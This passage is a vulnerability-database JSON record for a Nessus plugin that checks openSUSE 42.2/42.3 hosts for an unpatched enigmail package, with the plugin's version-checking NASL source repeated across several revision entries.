{"id": "OPENSUSE-2017-1403.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "description": "This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service", "published": "2017-12-26T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/105452", "reporter": "This script is Copyright (C) 2017 Tenable Network Security, Inc.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "cvelist": [], "type": "nessus", "lastseen": "2019-11-01T03:01:30", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-01-16T20:30:41", "references": [{"idList": ["SUSE_SU-2016-3286-1.NASL", "FEDORA_2016-E523C37B4D.NASL", "OPENSUSE-2017-58.NASL", "OPENSUSE-2016-1403.NASL", "OPENSUSE-2016-1373.NASL", "UBUNTU_USN-3143-1.NASL", "FEDORA_2016-4F34F26649.NASL", "OPENSUSE-2016-1277.NASL", "FREEBSD_PKG_28BB6EE59B5C11E6B79919BEF72F4B7C.NASL", "GENTOO_GLSA-201701-28.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:1361412562310809971", "OPENVAS:1361412562310872045", "OPENVAS:1361412562310809973", "OPENVAS:1361412562310842966", "OPENVAS:1361412562310872067", "OPENVAS:1361412562310809911", "OPENVAS:1361412562310809928", "OPENVAS:1361412562310810103"], "type": "openvas"}, {"idList": ["GLSA-201701-28"], "type": "gentoo"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "728123704d229c5a813e741b5c23feb63247528cfd6af0d631b6f86939ce048b", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": "references"}, {"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "417b09c709f67767e29fa2d2bff8400a", "key": "href"}, {"hash": "924361c4dc424b356a38cd5a5e0408de", "key": "description"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2019-01-16T20:30:41", "modified": "2017-12-26T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "105452", "published": "2017-12-26T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 2, "lastseen": "2019-01-16T20:30:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues (boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public key with a corresponding secret key controlled by an attacker\n\n - Enigmail could have replayed encrypted content in partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "7b994fd8c9dc6bbc99dcad34611ee0d6a47fb1bcc9c9ccd05c9f4b8e43067886", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": "references"}, {"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "417b09c709f67767e29fa2d2bff8400a", "key": "href"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "7f89b3e748296955b42e2a02729b1b80", "key": "description"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2017-12-27T12:55:54", "modified": "2017-12-26T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "105452", "published": "2017-12-26T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-12-27T12:55:54"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues (boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public key with a corresponding secret key controlled by an attacker\n\n - Enigmail could have replayed encrypted content in partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-02-21T01:34:42", "references": [{"idList": ["OPENVAS:1361412562310872045", "OPENVAS:1361412562310842966", "OPENVAS:1361412562310872067"], "type": "openvas"}, {"idList": ["RHSA-2017:0002"], "type": "redhat"}, {"idList": ["SUSE_SU-2016-3286-1.NASL", "FEDORA_2016-E523C37B4D.NASL", "OPENSUSE-2017-58.NASL", "SUSE_SU-2016-2898-1.NASL", "OPENSUSE-2016-1403.NASL", "OPENSUSE-2016-1373.NASL", "UBUNTU_USN-3143-1.NASL", "SUSE_SU-2016-3287-1.NASL", "FEDORA_2016-4F34F26649.NASL", "GENTOO_GLSA-201701-28.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:893B03F04798265D72F00A7762693EAD", "THREATPOST:CBFAA2319AF4281EC1DD5C4682601942"], "type": "threatpost"}, {"idList": ["USN-3143-1"], "type": "ubuntu"}, {"idList": ["MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_IMSVA_WIDGET_EXEC"], "type": "metasploit"}, {"idList": ["GLSA-201701-28"], "type": "gentoo"}]}, "score": {"modified": "2019-02-21T01:34:42", "value": 1.2, "vector": "NONE"}}, "hash": "7b994fd8c9dc6bbc99dcad34611ee0d6a47fb1bcc9c9ccd05c9f4b8e43067886", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": "references"}, {"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "417b09c709f67767e29fa2d2bff8400a", "key": "href"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "7f89b3e748296955b42e2a02729b1b80", "key": "description"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2019-02-21T01:34:42", "modified": "2017-12-26T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "105452", "published": "2017-12-26T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["description", "reporter", "modified", "href"], "edition": 3, "lastseen": "2019-02-21T01:34:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-10-28T20:48:23", "references": [{"idList": ["OPENVAS:1361412562310704469", "OPENVAS:1361412562310876390"], "type": "openvas"}, {"idList": ["ELSA-2018-3041", "ELSA-2019-4702", "ELSA-2019-4713", "ELSA-2019-4732"], "type": "oraclelinux"}, {"idList": ["THREATPOST:CBFAA2319AF4281EC1DD5C4682601942"], "type": "threatpost"}, {"idList": ["DEBIAN:DSA-4469-1:B9B08"], "type": "debian"}, {"idList": ["KB4494441"], "type": "mskb"}, {"idList": ["DEBIAN_DSA-4469.NASL", "REDHAT-RHSA-2019-1190.NASL", "SUSE_SU-2016-2898-1.NASL", "SUSE_SU-2019-1287-1.NASL", "REDHAT-RHSA-2019-1170.NASL", "EULEROS_SA-2019-1588.NASL", "EULEROS_SA-2019-1586.NASL"], "type": "nessus"}, {"idList": ["RHSA-2019:1190", "RHSA-2019:1170"], "type": "redhat"}, {"idList": ["MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC"], "type": "metasploit"}]}, "score": {"modified": "2019-10-28T20:48:23", "value": 1.2, "vector": "NONE"}}, "hash": "198060f1b77f4025f2de55a3171cc64e4d6d7eeac61f19e17754ad932a69b099", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": "references"}, {"hash": "58e6fa5c9fa960c7b16faef32456c3e2", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "7e4308681efd8978171e2f0d2dab8b79", "key": "reporter"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "924361c4dc424b356a38cd5a5e0408de", "key": "description"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2019-10-28T20:48:23", "modified": "2019-10-02T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "105452", "published": "2017-12-26T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "This script is Copyright (C) 2017 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified"], "edition": 4, "lastseen": "2019-10-28T20:48:23"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "3534a67c2a45e8693917a1aa029c2c8a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "924361c4dc424b356a38cd5a5e0408de"}, {"key": "href", "hash": "58e6fa5c9fa960c7b16faef32456c3e2"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "c36d97390a7f025c98d5b1a13740d009"}, {"key": "published", "hash": "3487ad13e00e4e90d860294ed8b233be"}, {"key": "references", "hash": "3c82f25bf837b29ecb737f895c32996b"}, {"key": "reporter", "hash": "7e4308681efd8978171e2f0d2dab8b79"}, {"key": "sourceData", "hash": "dcd374620f55089e90475444843870c7"}, {"key": "title", "hash": "29f203d0c2ab07cf580e42855d9987f8"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "7118fc8d83cbd809d2a03090e452bb222aeca65eedfe2069483d0c2a1ac9550f", "viewCount": 0, "enchantments": {"dependencies": {"references": 